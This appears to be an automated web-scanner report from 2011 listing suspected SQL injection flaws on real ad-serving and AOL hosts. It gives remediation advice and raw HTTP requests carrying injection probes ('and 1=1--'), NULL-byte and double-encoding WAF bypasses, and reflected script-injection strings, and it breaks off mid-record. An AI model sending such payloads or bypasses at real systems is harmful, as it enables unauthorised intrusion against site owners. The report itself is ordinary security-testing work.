SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs that you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The fu parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fu parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00'&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 23:05:39 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 14517
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime ...[SNIP]... c?c:"http://csi.gstatic.com/csi","?v=3","&s="+(d[f].sn||"pagead")+"&action=",a.name,m.length?"&it="+m.join(","):"","",g,"&rt=",p.join(",")].join("");b=new Image;var r=d[f].c++;d[f].a[r]=b;b.onload=b.onerror=function(){delete d[f].a[r]};b.src=a;b=null;return a}};var l=d[f].load;function o(a,b){var c=parseInt(a,10);if(c> ...[SNIP]...
Request 2
GET /pagead/ads?client=ca-pub-5112821747420583&format=336x280_as&output=html&h=280&w=336&lmt=1296965252&channel=2020812945&ad_type=text_image&alt_color=EFF3F7&color_bg=EFF3F7&color_border=EFF3F7&color_link=2490D2&color_text=000000&color_url=5C5C5C&flash=10.1.103&url=http%3A%2F%2Fwww.filetransit.com%2Fdemo.php%3F6e3f0%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6896f2e55e7%3D1&dt=1296943652258&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296943652281&frm=0&adk=871793777&ga_vid=67021654.1296943652&ga_sid=1296943652&ga_hid=914616203&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&eid=36815002&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0%00''&ifi=1&dtd=80&xpc=SbKz6UFPiZ&p=http%3A//www.filetransit.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.filetransit.com/demo.php?6e3f0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6896f2e55e7=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 23:05:40 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 11429
The url parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the url parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d1--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 22:43:12 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 5053
Request 2
GET /pagead/ads?client=ca-pub-8946084125644802&output=html&h=90&slotname=1903810917&w=120&lmt=1296965214&flash=10.1.103&url=http%3A%2F%2Fwww.linuxsecurity.com%2Fadvisories%2F%3F1'%3D1'%20and%201%3d2--%20&dt=1296945314953&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6016247947&correlator=1296945312778&frm=0&adk=343220409&ga_vid=34780583.1296945313&ga_sid=1296945313&ga_hid=717362596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=985&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F23&fu=0&ifi=2&dtd=17&xpc=Kc5XABeAHH&p=http%3A//www.linuxsecurity.com HTTP/1.1 Host: googleads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Sat, 05 Feb 2011 22:43:13 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Content-Length: 5032
1.3. http://latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10145548'%20or%201%3d1--%20 and 10145548'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d1--%20=1 HTTP/1.1 Host: latino.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
</script> </div> <div id="nav"><div id="navW" class="M"> <div class="dir"> <div id="dirhd"> <ul id="dhL2"> <li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li> </ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div> <div id="dircnt"> <ul id="om_dir_col1_" class="serv c noic"></ul> <ul id="om_dir_col1_" class="serv c0 noic"> <li><a id="d1" title="IM friends right from your browser -no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>
<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>
<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope ...[SNIP]...
Request 2
GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video?110145548'%20or%201%3d2--%20=1 HTTP/1.1 Host: latino.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
</script> </div> <div id="nav"><div id="navW" class="M"> <div class="dir"> <div id="dirhd"> <ul id="dhL2"> <li class="dhL1"><a accesskey="M" href="http://webmail.aol.com" name="om_dirbtn1">Mail</a></li> </ul><a id="amre" title="Discover AOL provides information about AOL's many products and services, including free software, Safety and Security tools, and free services. " name="om_dir_a-z" onclick="icid(this,'icid=navbar_More');" href="http://about.aol.com/sitemap/">Can't Find It? AOL A to Z</a></div> <div id="dircnt"> <ul id="om_dir_col1_" class="serv c noic"></ul> <ul id="om_dir_col1_" class="serv c0 noic"> <li><a id="d1" title="IM friends right from your browser -..no download required" class="nIcn" onclick="ae7.launch(); return false; icid(this,'icid=navbar_AIM');" href="http://www.aim.com/products/express/">AIM</a></li>
<li><a id="d2" title="Research, find and buy new and used cars" class="nIcn" onclick="icid(this,'icid=navbar_Autos');" href="http://autos.aol.com/">Autos</a></li>
<li><a id="d17" title="Celebrity news and photos as well as top music, movie and TV news from Popeater" class="nIcn" onclick="icid(this,'icid=navbar_pope ...[SNIP]...
The cb parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cb parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00'&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:28 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIBohB5z2pknKpk7dMBnVZJ1DBBLfD22Pt+xU2PMB6YwzEpG+32MdrC/bifzPdADvQXT5iL0Ejk4SoBE/RbcgLQI0z29hms4++5c518R/zUMKkBDANZDDcfeSSJsmKZKYF4g+e5/vR3s5vQQ7KmJYRZ2Ke5I7+Px/Q1DWIeAxjVePvZA3qEWPWNA4pW0y2sicSGc+OlVoHYO+iW+etQJWO903qBRjyUMB0CsnUiLCSK7ynCeU5y8vPgJO/l5QmFEhQcxYvOtJH0zTOq/DdkOdd/SL0ajHQz1t4DCzkykwGq4Aw7x+tPgkAhoQGPt9IleOihg6gLkHmyjN8bS0MOCuU93O5YHhVCLopbJlVmacuwMv8bCtG3aUjz7yVRP2bGb25zrFQSIASGHiNo65FqRryWti1di9zr7c4KSwyrOw==.dJDZXe3hTuyZrPKKuugNLQ.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19714
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=pc-test.com,gofreemanuals.com,ebay.c ...[SNIP]... KCpxo9ichxH8ldyrWDOlTDIX0nEp9dmoIMEEUHcDE0aWSuqd0ezjPzLg2vwq7QhRJ6IBfF5G6sqRQsBqlrfmecBnceMPA%2FNVxpMVm55EolFY76tnNe82&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&ref=http%3A//burp/show/1&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=428%00''&loc=205,1872&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:28 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/SkJTIFoxB5zyrGvNooXWckqgQj0XDDSYJM4fZ/UN5/pNoUWjY2UStRAsZ8z+UER5ssfI1MfMTt/HEA+fUJ+mJOUAA27n1jL4aNT6t45eInqrtq/te5yFu/4TgWJgPF3lanaA/WQL0hGR4YNn40OphE1cqtxFAiYkM1oYqHQjxQc7aTwAKpHz+B9MDKPLyrxntwh3/i2mJX5Nc/Q90Zv2UrsgXZTlZb8We5HR60n1BuMzOoS0f2BaCmBktIv0KuD7JiPQ8vvPW3a/RSzF+w+ieyhBpSZyayzNgFIk3CxJ1Er4t1IIZN5fMORUpiILRivZqer79VNpU3Z7/GIz5YXjdAKpV/kZh2ArN9FGGu9PQbNss3p1F+wvGCxJwowXASlEVIlb3eIZsCuDbU6YuQ8/JIpoTrl77tvTTezvSiw3n4w6Ya.XCrCvBdO0LVqEPsFqbfYvA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:02:28 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 20057
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,gofreemanuals. ...[SNIP]...
The cl_site_link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the cl_site_link parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the cl_site_link request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 1
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:03:04 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=G/Sk5qAFuhB59X9RSPW7cuX5BjLSsC03SVEk82l5MNAgAnNo673eS84tAp+za0YwsMeVekfsK3TP/Q67SgdYA8R1yGFrOkUNg1YOW6xDpzwv0dIL7C1mtDBX5no1JyUMKe8U3R9rTsUHae6xXoN/s0UNSnTBaZ8fZflGHPQmUQxQUYIEHm6oTR8fvN3CXOlCU2UpUdtl27oFWaqtfb6hy/xbC9QJl10w3q4RBKj7+JgNtLTCNbQ8+PfOMxQTyn2+gtbV0Ex4pGqbu1+Su95/0Ux9LNQV3gAFKht8/dyPjYc1vXOdQM6f5RSsm2cAFg3w0MGJlUU0EnLblOfvdGvlyXWW3hOx3nmBQihS4AY7cPIByNTm+gmRP1z8LiMIj/Z61MsOvK5N4ha7ILE2hEdAzL9PG/IC4gLURn3j6xkza3w5TxLbEs7PEwgix1WJMMCz+ss753/VNwoZ7mUR7Hd7+MXThNjF7bUSSjs4R8MVkEdSyLgXeXdIl8Uwk61wqQ==.4gWHTv/7aOocs7YpvOTMrA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 19038
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=home-warranty.firstam.com,homewarran ...[SNIP]... gYZKPBN4JCKZoLQG8l5d70OEnJGhuQplXG%2FzRyTwAzRaGBLVM9lQz5Zr%2B4E92M6fWD2ZHc5UnKJZ8o%2BDEbw1CFsq%2B6QBonqYdQ0FLncw%3D%3D&template=v1-450xauto\">Your Free recommended download to fix Windows Vista and XP errors!<!--overture--> ...[SNIP]...
Request 2
GET /minimall?w=450&h=auto&client=OwnerIQ&sid=Chitika%20Default&url=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&ref=http%3A//burp/show/2&nump=3&type=mpu&cl_border=%23FFFFFF&cl_bg=%23FFFFFF&cl_title=%230068B3&cl_text=333333&cl_site_link=%230068B3%2527%2527&screenres=1920x1200&winsize=995x1094&canvas=969x225&frm=false&history=2&cb=159&loc=205,1844&output=simplejs&callback=ch_ad_render_search HTTP/1.1 Host: mm.chitika.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cc=G/SkJTIFoxB5zyrGvNoopWH98lzIGX09Lqf5eXifPARQKIeBMDE2hXiO2v2mk4qq+VP5P+m5J4eRJC5zWa+7Jf/jc6jkVmF/MbVWYaETxPD821XiL9JnE93XkPahPfrLgcfAbrpHrHNZJnEeObU3OtCTVkfYYH7KACiAKZU6LmYWAtjWSyuwX+GHPstuHx9zwtQHlMeOjOOZqdwl722uq28wErLf/s1odnEP3DQeHuP1taSO/8VINxZmUH3OCHKjzoEA3Ep2hvSi4fTUQ9xQg5HBigwFw6FcG4XjG/ZwAf++TM2bd6D6MDuMeCmjszjwKZD/DVxhbPa1zjGTdrpztnAx7H5aYU7Rqim51ZoqsIAq7yljuMQoFzxW0QdFZuKMR6dZIfdTULQZElAm9UvyESXU0bZ2j55Oz02Ty6P8x00eoqYu.JlGLkqSjkssYk0faKwa/ow.4
Response 2
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:03:04 GMT Server: Apache P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: _cc=...[SNIP]....4gWHTv/7aOocs7YpvOTMrA.4; path=/; domain=.chitika.net; expires=Sun, 05-Feb-2012 23:03:04 GMT Vary: Accept-Encoding Connection: close Content-Type: application/x-javascript; charset=utf-8 Content-Length: 18984
var ch_mmhtml = {"mobilehtml":"","pixelhtml":"","snurl":"http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=open-with.pc-test.com,sparxsystems.c ...[SNIP]...
The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
